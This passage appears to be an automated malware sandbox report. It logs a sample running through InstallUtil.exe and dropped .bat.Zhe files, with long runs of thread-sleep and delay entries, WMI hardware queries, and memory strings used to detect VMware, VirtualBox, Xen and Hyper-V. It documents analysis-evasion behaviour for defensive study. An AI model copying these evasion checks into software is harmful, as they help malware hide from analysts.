                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -98875s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -98766s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -98654s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -98541s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -98379s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -98206s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -98090s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -97970s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -97844s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -97733s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -97609s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -97500s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -97390s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -97280s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -97171s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -97047s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -96938s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -96828s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -96719s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -96594s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -96484s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -96375s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -96266s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -96156s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -96047s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -95937s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -95827s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -95715s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -95328s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -95125s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -95015s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -94906s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -94797s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -94688s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -94578s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -94469s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -94359s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -94250s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -94141s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -94031s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -93922s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -93797s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -93687s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -93578s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe TID: 4232Thread sleep count: 4361 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe TID: 4232Thread sleep count: 1359 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe TID: 5016Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -27670116110564310s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6784Thread sleep count: 3024 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -99874s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -99764s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6784Thread sleep count: 6803 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -99611s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -99484s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -99375s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -99265s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -99156s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -99047s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -98937s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -98827s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -98719s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -98609s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -98500s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -98390s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -98280s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -98169s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -98062s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -97953s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -97844s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -97719s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -97609s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -97500s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -97383s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -97265s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -97156s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -97045s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -96937s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -96828s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -96718s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -96608s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -96492s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -96389s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -96281s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -96171s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -96062s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -95953s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -95825s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -95719s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -95605s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -95484s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -95375s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -95265s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -95155s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -95047s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -94937s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -94819s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -1799964s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -1799860s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -1799735s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560Thread sleep time: -1799610s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99778Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99670Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99219Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99107Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98995Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98654Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98541Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98379Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98206Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98090Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97970Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97844Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97733Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97609Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97500Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97390Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97280Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97171Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97047Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96938Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96828Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96719Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96594Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96484Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96375Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96266Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96156Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96047Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95937Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95827Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95715Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95125Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95015Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94906Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94797Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94688Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94469Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94250Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94141Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94031Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 93922Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 93797Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 93687Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 93578Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99874
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99764
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99611
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99484
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99375
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99265
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99156
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99047
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98937
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98827
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98719
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98609
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98390
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98280
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98169
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98062
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97953
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97844
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97719
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97609
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97383
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97265
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97156
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97045
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96937
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96828
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96718
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96608
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96492
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96389
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96281
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96171
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96062
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95953
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95825
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95719
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95605
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95484
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95375
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95265
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95155
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95047
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94937
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94819
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1799964
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1799860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1799735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1799610
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000005783000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: InstallUtil.exe, 00000014.00000002.4714376240.0000000005940000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
                    Source: ChannelUris.bat.Zhe, 00000013.00000002.2415826466.00000000052F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: ChannelUris.bat.Zhe, 00000013.00000002.2415826466.00000000052F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                    Source: ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000005783000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMwareVBox
                    Source: InstallUtil.exe, 00000008.00000002.2413879182.0000000000B3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
